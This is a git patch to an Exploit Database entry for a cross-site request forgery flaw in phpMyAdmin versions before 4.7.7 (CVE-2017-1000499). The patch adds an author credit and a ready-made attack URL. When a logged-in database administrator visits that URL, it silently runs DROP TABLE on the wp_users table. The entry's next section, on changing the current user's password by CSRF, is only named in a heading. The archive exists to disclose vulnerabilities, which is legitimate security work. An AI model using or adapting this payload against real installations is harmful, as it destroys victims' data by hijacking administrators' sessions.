From 0f49f84ff412a7d143ad2e460be959c7d332d785 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 4 Nov 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-11-04 1 changes to exploits/shellcodes --- exploits/php/webapps/45284.txt | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exploits/php/webapps/45284.txt b/exploits/php/webapps/45284.txt index 586a550b1..eb32fa041 100644 --- a/exploits/php/webapps/45284.txt +++ b/exploits/php/webapps/45284.txt @@ -5,7 +5,12 @@ # Software Link: https://www.phpmyadmin.net/downloads/ # Version: Versions 4.7.x (prior to 4.7.7) # Tested on: php7 mysql5 -# CVE: CVE-2017-1000499 +# CVE: CVE-2017-1000499 -- Original Exploit Author: Ashutosh Barot + +# Original Exploit Author: Ashutosh Barot ( www.twitter.com/ashu_barot) +# If victim DB Admin has active session with PhPMyAdmin < 4.7.7, Hitting this URL will result into DROP_TABLE, + +https://example.com/phpMyAdmin/sql.php?db=DATABASE_NAME&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped # Exploit CSRF - Modifying the password of current user